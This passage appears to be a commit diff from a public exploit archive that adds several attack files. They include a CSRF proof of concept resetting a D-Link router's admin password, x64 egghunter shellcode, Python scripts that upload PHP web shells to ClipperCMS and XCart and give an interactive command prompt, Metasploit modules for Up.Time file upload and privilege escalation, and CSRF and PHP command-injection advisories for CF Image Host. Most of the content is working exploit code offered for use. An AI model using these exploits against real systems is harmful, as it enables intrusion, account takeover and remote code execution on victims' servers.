<input type="hidden" name="<&#63;xml&#32;version" value=""1&#46;0"&#32;encoding&#61;"UTF&#45;8"&#63;>&#10;<postxml>&#10;<module>&#10;&#9;<service>DEVICE&#46;ACCOUNT<&#47;service>&#10;&#9;<device>&#10;&#9;&#9;<gw&#95;name>DIR&#45;816L<&#47;gw&#95;name>&#10;&#9;&#9;&#10;&#9;&#9;<account>&#10;&#9;&#9;&#9;<seqno>1<&#47;seqno>&#10;&#9;&#9;&#9;<max>2<&#47;max>&#10;&#9;&#9;&#9;<count>1<&#47;count>&#10;&#9;&#9;&#9;<entry>&#10;&#9;&#9;&#9;&#9;<uid>USR&#45;<&#47;uid>&#10;&#9;&#9;&#9;&#9;<name>Admin<&#47;name>&#10;&#9;&#9;&#9;&#9;<usrid&#47;>&#10;&#9;&#9;&#9;&#9;<password>password<&#47;password>&#10;&#9;&#9;&#9;&#9;<group>0<&#47;group>&#10;&#9;&#9;&#9;&#9;<description&#47;>&#10;&#9;&#9;&#9;<&#47;entry>&#10;&#9;&#9;<&#47;account>&#10;&#9;&#9;<group>&#10;&#9;&#9;&#9;<seqno&#47;>&#10;&#9;&#9;&#9;<max&#47;>&#10;&#9;&#9;&#9;<count>0<&#47;count>&#10;&#9;&#9;<&#47;group>&#10;&#9;&#9;<session>&#10;&#9;&#9;&#9;<captcha>1<&#47;captcha>&#10;&#9;&#9;&#9;<dummy&#47;>&#10;&#9;&#9;&#9;<timeout>180<&#47;timeout>&#10;&#9;&#9;&#9;<maxsession>128<&#47;maxsession>&#10;&#9;&#9;&#9;<maxauthorized>16<&#47;maxauthorized>&#10;&#9;&#9;<&#47;session>&#10;&#9;<&#47;device>&#10;<&#47;module>&#10;<module>&#10;&#9;<service>HTTP&#46;WAN&#45;1<&#47;service>&#10;&#9;<inf>&#10;&#9;&#9;<web><&#47;web>&#10;&#9;&#9;<https&#95;rport><&#47;https&#95;rport>&#10;&#9;&#9;<stunnel>1<&#47;stunnel>&#10;&#9;&#9;<weballow>&#10;&#9;&#9;&#9;<hostv4ip&#47;>&#10;&#9;&#9;<&#47;weballow>&#10;&#9;&#9;<inbfilter&#47;>&#10;&#9;<&#47;inf>&#10;&#9;&#10;<&#47;module>&#10;<module>&#10;&#9;<service>HTTP&#46;WAN&#45;2<&#47;service>&#10;&#9;<inf>&#10;&#9;&#9;<active>0<&#47;active>&#10;&#9;&#9;<nat>NAT&#45;1<&#47;nat>&#10;&#9;&#9;<web&#47;>&#10;&#9;&#9;<weballow>&#10;&#9;&#9;&#9;<hostv4ip&#47;>&#10;&#9;&#9;<&#47;weballow>&#10;&#9;<&#47;inf>&#10;&#9;&#10;<&#47;module>&#10;<module>&#10;&#9;<service>INBFILTER<&#47;service>&#10;&#9;<acl>&#10;&#9;&#9;<inbfilter>&#9;&#9;&#10;&#9;&#9;&#9;&#9;&#9;&#9;<seqno>1<&#47;seqno>&#10;&#9;&#9;&#9;<max>24<&#47;max>&#10;&#9;&#9;&#9;<count>0<&#47;count>&#10;&#10;&#9;&#9;<&#47;inbfilter>&#9;&#9;&#10;&#9;<&#47;acl>&#10;&#9;<ACTIVATE>ignore<&#47;ACTIVATE>&#10;<FATLADY>ignore<&#47;FATLADY><SETCFG>ignore<&#47;SETCFG><&#47;module>&#10;<module>&#10;&#9;<service>SHAREPORT<&#47;service>&#10;&#9;<FATLADY>ignore<&#47;FATLADY>&#10;&#9;&#10;<ACTIVATE>ignore<&#47;ACTIVATE><&#47;module>&#10;<module>&#10;&#9;<service>SAMBA<&#47;service>&#10;&#9;<samba>&#9;&#9;&#10;&#9;&#9;&#32;&#32;&#32;&#32;&#10;&#9;&#9;<enable>1<&#47;enable>&#10;&#9;&#9;<auth>1<&#47;auth>&#10;&#10;&#32;&#32;&#32;&#32;<&#47;samba>&#10;<&#47;module>&#10;<&#47;postxml>" />
</form>
<script>alert("This is CSRF PoC");document.getElementById("csrf").submit()</script>
<iframe style="display:none" name="hiddencommit"></iframe>
<form action="http://192.168.0.1/pigwidgeon.cgi" method="POST" target="hiddencommit" id="csrf1">
<input type="hidden" name="ACTIONS" value="SETCFG&#44;SAVE&#44;ACTIVATE" />
</form>
<script>document.getElementById("csrf1").submit()</script>
</body>
</html>
Patched/Fixed Firmware and notes:
==========================
2.06.B09_BETA -- ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-816L/DIR-816L_REVB_FIRMWARE_PATCH_2.06.B09_BETA.ZIP
2.06.B09_BETA -- ftp://FTP2.DLINK.COM/SECURITY_ADVISEMENTS/DIR-816L/DIR-816L_REVB_FIRMWARE_PATCH_NOTES_2.06.B09_BETA_EN.PDF
Credits:
=======
Bhadresh Patel
Senior Security Analyst
HelpAG (www.helpag.com)
----------------------------------------------------------------------------------------------

View file

@ -0,0 +1,43 @@
/*
;Title: x64 Linux egghunter in 24 bytes
;Author: David Velázquez a.k.a d4sh&r
;Contact: https://mx.linkedin.com/in/d4v1dvc
;Description: x64 Linux egghunter that looks for the string "h@ckh@ck"
; and then execute the shellcode
;Tested On: Linux kali64 3.18.0-kali3-amd64 x86_64 GNU/Linux
;Compile & Run: nasm -f elf64 -o egghunter.o egghunter.nasm
; ld -o egghunter egghunter.o
;SLAE64-1379
global _start
_start:
pop rax ; some address in the stack
search:
inc rax
cmp [rax - 4] , dword 0x6b634068 ; "h@ck"
jnz search
cmp [rax - 8] , dword 0x6b634068 ; "h@ck"
jnz search
call rax ; execute shellcode
*/
#include<stdio.h>
#include<string.h>
//gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
unsigned char hunter[] = "\x58\x48\xff\xc0\x81\x78\xfc\x68\x40\x63\x6b\x75\xf4\x81\x78\xf8\x68\x40\x63\x6b\x75\xeb\xff\xd0";
unsigned char egg[] = \
"\x68\x40\x63\x6b" //egg
"\x68\x40\x63\x6b" //egg
"\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x0$
int main()
{
printf("Hunter Length: %d\n", (int)strlen(hunter));
(*(void (*)()) hunter)();
}

View file

@ -0,0 +1,26 @@
##################################
# Andrea Sindoni - @invictus1306 #
##################################
XSS vulnerability via metadata
1. Introduction
Affected Product: VLC 2.2.1 / WEB INTERFACE
Vulnerability Type: XSS
2. Vulnerability Description
XSS vulnerability via metadata title
3. Proof of Concept
3.1 Launch: vlc.exe --http-host=127.0.0.1 --http-port=8080 --http-password=andrea
3.2 Open Browser and go to localhost:8080 (for more info see https://wiki.videolan.org/Documentation:Modules/http_intf/)
3.3 Then left username blank and password andrea
3.4 Select poc.mp3 (attached) file
3.5 See Attached image
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38706.zip

81
platforms/php/remote/38730.py Executable file
View file

@ -0,0 +1,81 @@
#!/usr/local/bin/python
# Exploit for ClipperCMS 1.3.0 Code Execution vulnerability
# An account is required with rights to file upload (eg a user in the Admin, Publisher, or Editor role)
# The server must parse htaccess files for this exploit to work.
# Curesec GmbH crt@curesec.com
import sys
import re
import requests # requires requests lib
if len(sys.argv) != 4:
exit("usage: python " + sys.argv[0] + " http://example.com/ClipperCMS/ admin admin")
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
loginPath = "/manager/processors/login.processor.php"
fileManagerPath = "/manager/index.php?a=31"
def login(requestSession, url, username, password):
postData = {"ajax": "1", "username": username, "password": password}
return requestSession.post(url, data = postData, headers = {"referer": url})
def getFullPath(requestSession, url):
request = requestSession.get(url, headers = {"referer": url})
if "You don't have enough privileges" in request.text:
return "cant upload"
fullPath = re.search("var current_path = '(.*)';", request.text)
return fullPath.group(1)
def upload(requestSession, url, fileName, fileContent, postData):
filesData = {"userfile[0]": (fileName, fileContent)}
return requestSession.post(url, files = filesData, data = postData, headers = {"referer": url})
def workingShell(url, fullPath):
return fullPath.strip("/") in requests.get(url + "pwd", headers = {"referer": url}).text.strip("/")
def runShell(url):
print("enter command, or enter exit to quit.")
command = raw_input("$ ")
while "exit" not in command:
print(requests.get(url + command).text)
command = raw_input("$ ")
requestSession = requests.session()
loginResult = login(requestSession, url + loginPath, username, password)
if "Incorrect username" in loginResult.text:
exit("ERROR: Incorrect username or password")
else:
print("successful: login as " + username)
fullPath = getFullPath(requestSession, url + fileManagerPath)
if fullPath == "cant upload":
exit("ERROR: user does not have required privileges")
else:
print("successful: user is allowed to use file manager. Full path: " + fullPath)
uploadResult = upload(requestSession, url + fileManagerPath, ".htaccess", "AddType application/x-httpd-php .png", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
exit("ERROR: could not upload .htaccess file")
else:
print("successful: .htaccess upload")
uploadResult = upload(requestSession, url + fileManagerPath, "404.png", "<?php passthru($_GET['x']) ?>", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
exit("ERROR: could not upload shell")
else:
print("successful: shell upload. Execute commands via " + url + "404.png?x=<COMMAND>")
if workingShell(url + "404.png?x=", fullPath):
print("successful: shell seems to be working")
else:
exit("ERROR: shell does not seem to be working correctly")
runShell(url + "404.png?x=")
#Blog Reference:
#http://blog.curesec.com/article/blog/ClipperCMS-130-Code-Execution-Exploit-96.html

66
platforms/php/remote/38731.py Executable file
View file

@ -0,0 +1,66 @@
#!/usr/local/bin/python
# Exploit for XCart 5.2.6 Code Execution vulnerability
# An admin account is required to use this exploit
# Curesec GmbH
import sys
import re
import requests # requires requests lib
if len(sys.argv) != 4:
exit("usage: python " + sys.argv[0] + " http://example.com/xcart/ admin@example.com admin")
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
loginPath = "/admin.php?target=login"
fileManagerPath = "/admin.php?target=logo_favicon"
shellFileName = "404.php"
shellContent = "GIF89a;<?php passthru($_GET['x']); ?>"
def login(requestSession, url, username, password):
csrfRequest = requestSession.get(url)
csrfTokenRegEx = re.search('name="xcart_form_id" type="hidden" value="(.*)" class', csrfRequest.text)
csrfToken = csrfTokenRegEx.group(1)
postData = {"target": "login", "action": "login", "xcart_form_id": csrfToken, "login": username, "password": password}
loginResult = requestSession.post(url, data = postData).text
return "Invalid login or password" not in loginResult
def upload(requestSession, url, fileName, fileContent):
csrfRequest = requestSession.get(url)
csrfTokenRegEx = re.search('SimpleCMS" />\n<input type="hidden" name="xcart_form_id" value="(.*)" />', csrfRequest.text)
csrfToken = csrfTokenRegEx.group(1)
filesData = {"logo": (fileName, fileContent)}
postData = {"target": "logo_favicon", "action": "update", "page": "CDev\SimpleCMS", "xcart_form_id": csrfToken}
uploadResult = requestSession.post(url, files = filesData, data = postData)
return "The data has been saved successfully" in uploadResult.text
def runShell(url):
print("enter command, or enter exit to quit.")
command = raw_input("$ ")
while "exit" not in command:
print(requests.get(url + command).text.replace("GIF89a;", ""))
command = raw_input("$ ")
requestSession = requests.session()
if login(requestSession, url + loginPath, username, password):
print("successful: login")
else:
exit("ERROR: Incorrect username or password")
if upload(requestSession, url + fileManagerPath, shellFileName, shellContent):
print("successful: file uploaded")
else:
exit("ERROR: could not upload file")
runShell(url + shellFileName + "?x=")
Blog Reference:
http://blog.curesec.com/article/blog/XCart-526-Code-Execution-Exploit-87.html

103
platforms/php/remote/38732.rb Executable file
View file

@ -0,0 +1,103 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability found within the Up.Time
monitoring server 7.2 and below. A malicious entity can upload a PHP file into the
webroot without authentication, leading to arbitrary code execution.
Although the vendor fixed Up.Time to prevent this vulnerability, it was not properly
mitigated. To exploit against a newer version of Up.Time (such as 7.4), please use
exploits/multi/http/uptime_file_upload_2.
},
'Author' =>
[
'Denis Andzakovic <denis.andzakovic[at]security-assessment.com>' # Vulnerability discoverey and MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '100423' ],
[ 'BID', '64031'],
[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf' ]
],
'Payload' =>
{
'Space' => 10000, # just a big enough number to fit any PHP payload
'DisableNops' => true
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Up.Time 7.0/7.2', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 19 2013'))
register_options([
OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),
Opt::RPORT(9999)
], self.class)
end
def check
uri = target_uri.path
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'wizards', 'post2file.php')
})
if res and res.code == 500 and res.body.to_s =~ /<title><\/title>/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
print_status("#{peer} - Uploading PHP to Up.Time server")
uri = target_uri.path
@payload_name = "#{rand_text_alpha(5)}.php"
php_payload = get_write_exec_payload(:unlink_self => true)
post_data = ({
"file_name" => @payload_name,
"script" => php_payload
})
print_status("#{peer} - Uploading payload #{@payload_name}")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'wizards', 'post2file.php'),
'vars_post' => post_data,
})
unless res and res.code == 200 and res.body.to_s =~ /<title><\/title>/
fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
end
print_status("#{peer} - Executing payload #{@payload_name}")
res = send_request_cgi({
'uri' => normalize_uri(uri, 'wizards', @payload_name),
'method' => 'GET'
})
end
end

408
platforms/php/remote/38733.rb Executable file
View file

@ -0,0 +1,408 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'nokogiri'
class Metasploit4 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload',
'Description' => %q{
This module exploits a vulnerability found in Uptime version 7.4.0 and 7.5.0.
The vulnerability began as a classic arbitrary file upload vulnerability in post2file.php,
which can be exploited by exploits/multi/http/uptime_file_upload_1.rb, but it was mitigated
by the vendor.
Although the mitigiation in place will prevent uptime_file_upload_1.rb from working, it
can still be bypassed and gain privilege escalation, and allows the attacker to upload file
again, and execute arbitrary commands.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Denis Andzakovic', # Found file upload bug in post2file.php in 2013
'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>',
'Gjoko Krstic(LiquidWorm) <gjoko[at]zeroscience.mk>'
],
'References' =>
[
['EDB', '37888'],
['URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php']
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [['Automatic', {}]],
'Privileged' => 'true',
'DefaultTarget' => 0,
# The post2file.php vuln was reported in 2013 by Denis Andzakovic. And then on Aug 2015,
# it was discovered again by Ewerson 'Crash' Guimaraes.
'DisclosureDate' => 'Nov 18 2013'
))
register_options(
[
Opt::RPORT(9999),
OptString.new('USERNAME', [true, 'The username to authenticate as', 'sample']),
OptString.new('PASSWORD', [true, 'The password to authenticate with', 'sample'])
], self.class)
register_advanced_options(
[
OptString.new('UptimeWindowsDirectory', [true, 'Uptime installation path for Windows', 'C:\\Program Files\\uptime software\\']),
OptString.new('UptimeLinuxDirectory', [true, 'Uptime installation path for Linux', '/usr/local/uptime/']),
OptString.new('CmdPath', [true, 'Path to cmd.exe', 'c:\\windows\\system32\\cmd.exe'])
], self.class)
end
def print_status(msg='')
super("#{rhost}:#{rport} - #{msg}")
end
def print_error(msg='')
super("#{rhost}:#{rport} - #{msg}")
end
def print_good(msg='')
super("#{rhost}:#{rport} - #{msg}")
end
# Application Check
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path)
)
unless res
vprint_error("Connection timed out.")
return Exploit::CheckCode::Unknown
end
n = Nokogiri::HTML(res.body)
uptime_text = n.at('//ul[@id="uptimeInfo"]//li[contains(text(), "up.time")]')
if uptime_text
version = uptime_text.text.scan(/up\.time ([\d\.]+)/i).flatten.first
vprint_status("Found version: #{version}")
if version >= '7.4.0' && version <= '7.5.0'
return Exploit::CheckCode::Appears
end
end
Exploit::CheckCode::Safe
end
def create_exec_service(*args)
cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs = *args
res_service = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main.php'),
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
'vars_get' => {
'section' => 'ERDCInstance',
'subsection' => 'add',
},
'vars_post' => {
'initialERDCId' => '20',
'target' => '1',
'targetType' => 'systemList',
'systemList' => '1',
'serviceGroupList' => '-10',
'initialMode' => 'standard',
'erdcName' => 'Exploit',
'erdcInitialName' => '',
'erdcDescription' => 'Exploit',
'hostButton' => 'system',
'erdc_id' => '20',
'forceReload' => '0',
'operation' => 'standard',
'erdc_instance_id' => '',
'label_[184]' => 'Script Name',
'value_[184]' => cmd,
'id_[184]' => 'process',
'name_[process]' => '184',
'units_[184]' => '',
'guiBasic_[184]' => '1',
'inputType_[184]' => 'GUIString',
'screenOrder_[184]' => '1',
'parmType_[184]' => '1',
'label_[185]' => 'Arguments',
'value_[185]' => cmdargs,
'id_[185]' => 'args',
'name_[args]' => '185',
'units_[185]' => '',
'guiBasic_[185]' => '1',
'inputType_[185]' => 'GUIString',
'screenOrder_[185]' => '2',
'parmType_[185]' => '1',
'label_[187]' => 'Output',
'can_retain_[187]' => 'false',
'comparisonWarn_[187]' => '-1',
'comparison_[187]' => '-1',
'id_[187]' => 'value_critical_output',
'name_[output]' => '187',
'units_[187]' => '',
'guiBasic_[187]' => '1',
'inputType_[187]' => 'GUIString',
'screenOrder_[187]' => '4',
'parmType_[187]' => '2',
'label_[189]' => 'Response time',
'can_retain_[189]' => 'false',
'comparisonWarn_[189]' => '-1',
'comparison_[189]' => '-1',
'id_[189]' => 'value_critical_timer',
'name_[timer]' => '189',
'units_[189]' => 'ms',
'guiBasic_[189]' => '0',
'inputType_[189]' => 'GUIInteger',
'screenOrder_[189]' => '6',
'parmType_[189]' => '2',
'timing_[erdc_instance_monitored]' => '1',
'timing_[timeout]' => '60',
'timing_[check_interval]' => '10',
'timing_[recheck_interval]' => '1',
'timing_[max_rechecks]' => '3',
'alerting_[notification]' => '1',
'alerting_[alert_interval]' => '120',
'alerting_[alert_on_critical]' => '1',
'alerting_[alert_on_warning]' => '1',
'alerting_[alert_on_recovery]' => '1',
'alerting_[alert_on_unknown]' => '1',
'time_period_id' => '1',
'pageFinish' => 'Finish',
'pageContinue' => 'Continue...',
'isWizard' => '1',
'wizardPage' => '2',
'wizardNumPages' => '2',
'wizardTask' => 'pageFinish',
'visitedPage[1]' => '1',
'visitedPage[2]' => '1'
})
end
def exploit
vprint_status('Trying to login...')
# Application Login
res_auth = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_post' => {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})
unless res_auth
fail_with(Failure::Unknown, 'Connection timed out while trying to login')
end
# Check OS
phpfile_name = rand_text_alpha(10)
if res_auth.headers['Server'] =~ /Unix/
vprint_status('Found Linux installation - Setting appropriated PATH')
phppath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'apache/bin/ph')
uploadpath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'GUI/wizards')
cmdargs = "#{uploadpath}#{phpfile_name}.txt"
cmd = phppath
else
vprint_status('Found Windows installation - Setting appropriated PATH')
phppath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'apache\\php\\php.exe')
uploadpath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'uptime\\GUI\\wizards\\')
cmd = datastore['CmdPath']
cmdargs = "/K \"\"#{phppath}\" \"#{uploadpath}#{phpfile_name}.txt\"\""
end
if res_auth.get_cookies =~ /login=true/
cookie = Regexp.last_match(1)
cookie_split = res_auth.get_cookies.split(';')
vprint_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
print_good('Login success')
# Privilege escalation getting user ID
res_priv = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'main.php'),
'vars_get' => {
'page' => 'Users',
'subPage' => 'UserContainer'
},
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
)
unless res_priv
fail_with(Failure::Unknown, 'Connection timed out while getting userID.')
end
matchdata = res_priv.body.match(/UPTIME\.CurrentUser\.userId\.*/)
unless matchdata
fail_with(Failure::Unknown, 'Unable to find userID for escalation')
end
get_id = matchdata[0].gsub(/[^\d]/, '')
vprint_status('Escalating privileges...')
# Privilege escalation post
res_priv_elev = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main.php'),
'vars_get' => {
'section' => 'UserContainer',
'subsection' => 'edit',
'id' => "#{get_id}"
},
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
'vars_post' => {
'operation' => 'submit',
'disableEditOfUsernameRoleGroup' => 'false',
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'passwordConfirm' => datastore['PASSWORD'],
'firstname' => rand_text_alpha(10),
'lastname' => rand_text_alpha(10),
'location' => '',
'emailaddress' => '',
'emailtimeperiodid' => '1',
'phonenumber' => '',
'phonenumbertimeperiodid' => '1',
'windowshost' => '',
'windowsworkgroup' => '',
'windowspopuptimeperiodid' => '1',
'landingpage' => 'MyPortal',
'isonvacation' => '0',
'receivealerts' => '0',
'activexgraphs' => '0',
'newuser' => 'on',
'newuser' => '1',
'userroleid' => '1',
'usergroupid[]' => '1'
}
)
unless res_priv_elev
fail_with(Failure::Unknown, 'Connection timed out while escalating...')
end
# Refresing perms
vprint_status('Refreshing perms...')
res_priv = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php?loggedout'),
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
)
unless res_priv
fail_with(Failure::Unknown, 'Connection timed out while refreshing perms')
end
res_auth = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_post' => {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
)
unless res_auth
fail_with(Failure::Unknown, 'Connection timed out while authenticating...')
end
if res_auth.get_cookies =~ /login=true/
cookie = Regexp.last_match(1)
cookie_split = res_auth.get_cookies.split(';')
vprint_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
print_good('Priv. Escalation success')
end
# CREATING Linux EXEC Service
if res_auth.headers['Server'] =~ /Unix/
vprint_status('Creating Linux Monitor Code exec...')
create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs)
else
# CREATING Windows EXEC Service#
vprint_status('Creating Windows Monitor Code exec...')
create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs)
end
# Upload file
vprint_status('Uploading file...')
up_res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'wizards', 'post2file.php'),
'vars_post' => {
'file_name' => "#{phpfile_name}.txt",
'script' => payload.encoded
}
)
unless up_res
fail_with(Failure::Unknown, 'Connection timed out while uploading file.')
end
vprint_status('Checking Uploaded file...')
res_up_check = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'wizards', "#{phpfile_name}.txt")
)
if res_up_check && res_up_check.code == 200
print_good("File found: #{phpfile_name}")
else
print_error('File not found')
return
end
# Get Monitor ID
vprint_status('Fetching Monitor ID...')
res_mon_id = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'ajax', 'jsonQuery.php'),
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
'vars_get' => {
'query' => 'GET_SERVICE_PAGE_ERDC_LIST',
'iDisplayStart' => '0',
'iDisplayLength' => '10',
'sSearch' => 'Exploit'
}
)
unless res_mon_id
fail_with(Failure::Unknown, 'Connection timed out while fetching monitor ID')
end
matchdata = res_mon_id.body.match(/id=?[^>]*>/)
unless matchdata
fail_with(Failure::Unknown, 'No monitor ID found in HTML body. Unable to continue.')
end
mon_get_id = matchdata[0].gsub(/[^\d]/, '')
print_good("Monitor id aquired:#{mon_get_id}")
# Executing monitor
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main.php'),
'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
'vars_post' => {
'section' => 'RunERDCInstance',
'subsection' => 'view',
'id' => mon_get_id,
'name' => 'Exploit'
}
)
else
print_error('Cookie not found')
end
end
end

142
platforms/php/webapps/38698.html Executable file
View file

@ -0,0 +1,142 @@
<!--
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-CSRF.txt
Vendor:
====================================
codefuture.co.uk/projects/imagehost
Product:
===================================
CF Image Host 1.65 - 1.6.6
Archive download listed as: version 1.65
unzips as imagehost 1.6.6
Vulnerability Type:
=================================
Cross site request forgery - CSRF
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
No CSRF protection exists allowing attackers to make requests to the server
on behalf of the victim if they are logged in and visit a malicious site or
click
an infected linx. This will let attackers modify certain web application
settings to
whatever the attacker wishes.
CSRF Exploit code(s):
====================
-->
<form id='HELL' method="POST" action="
http://localhost/imagehost1.6.6/admin.php?act=set">
<input type="text" name="setScriptUrl" value="
http://hyp3rlinx.altervista.org" />
<input type="text" name="setTitle" value="ghostofsin" />
<input type="text" name="setSlogan" value="666" />
<input type="text" name="setCopyright" value="hyp3rlinx" />
<input type="text" name="setTheme" value="day" />
<input type="text" name="setModeRewrite" value="0" />
<input type="text" name="setAddThis" value="0" />
<input type="text" name="setLanguage" value="0" />
<input type="text" name="changesettings" value="Save+Changes" />
<input type="text" name="setModeRewrite" value="0" />
<input type="text" name="setAllowReport" value="1" />
<input type="text" name="setEmailReport" value="1" />
<input type="text" name="setHideGallery" value="1" />
<input type="text" name="setHideContact" value="1" />
<input type="text" name="setHideTos" value="1" />
<input type="text" name="setHideFaq" value="1" />
<input type="text" name="setHideSearch" value="1" />
<input type="text" name="setImageWidgit" value="1" />
<input type="text" name="setHideFeed" value="1" />
<input type="text" name="setHideSitemap" value="1" />
<input type="text" name="setAutoDeleted" value="0" />
<input type="text" name="setAutoDeletedTime" value="10" />
<input type="text" name="setAutoDeletedJump" value="m" />
<input type="text" name="setDisUpload" value="0" />
<input type="text" name="setAutoDeleted" value="0" />
<input type="text" name="setMaxSize" value="1048576" />
<input type="text" name="setMaxBandwidth" value="1024" />
<input type="text" name="setBandwidthReset" value="m" />
<input type="text" name="setMaxUpload" value="5" />
<input type="text" name="setNoDuplicate" value="0" />
<input type="text" name="setResizeImg" value="1" />
<input type="text" name="setPrivateImg" value="1" />
<input type="text" name="setWaterMark" value="0" />
<input type="text" name="setWatermarkText" value="0" />
<input type="text" name="setWatermarkImage" value="1" />
<input type="text" name="setWatermarkPlaced" value="1" />
<input type="text" name="setSUrlApi" value="b54" />
<input type="text" name="setSUrlApiUrl" value="" />
<input type="text" name="setSUrlApiUesr" value="" />
<input type="text" name="setSUrlApiPass" value="" />
<input type="text" name="setAnalytics" value="" />
<input type="text" name="setGoogleCha" value="" />
<input type="text" name="setGoogleAds" value="" />
<input type="text" name="oldPassword" value="" />
<input type="text" name="newPassword" value="" />
<input type="text" name="newConfirm" value="" />
<input type="text" name="setUserName" value="admin" />
<input type="text" name="setEmail" value="ghostofsin@abyss.com" />
<script>document.getElementById('HELL').submit()</script>
</form>
<!--
Disclosure Timeline:
=====================
Vendor Notification: NA
November 14, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
============================================================
Request Method(s): [+] POST
Vulnerable Product: [+] CF Image Host 1.65 - 1.6.6
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
-->

132
platforms/php/webapps/38699.txt Executable file
View file

@ -0,0 +1,132 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-PHP-CMD-INJECTION.txt
Vendor:
====================================
codefuture.co.uk/projects/imagehost
Product:
===================================
CF Image Host 1.65 - 1.6.6
Archive download listed as: version 1.65
unzips as imagehost 1.6.6
Vulnerability Type:
=====================
PHP Command Injection
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
CF Imagehost allows users who have access to the management area the
ability to write directly to the 'set.php' page under
the /inc directory that stores setting values for the 'Site Title', 'Site
Slogan' etc, this allows a local attacker ability to
inject specially crafted PHP command payloads to execute arbitrary
operating system commands on the victim host. Possibly leading
to privilege escalation, RFI, backdoors etc.. and most likely full
compromise of the affected system or shared environment
if applicable.
PHP Command Injection Exploit code(s):
=====================================
Under the setting tab we can inject following below PHP code and it will
remain persistent as it is written disk in 'set.php',
afterwards when the victim visits the application and click a tab the
persistent OS command will be executed.
1) navigate to CF image host settings tab
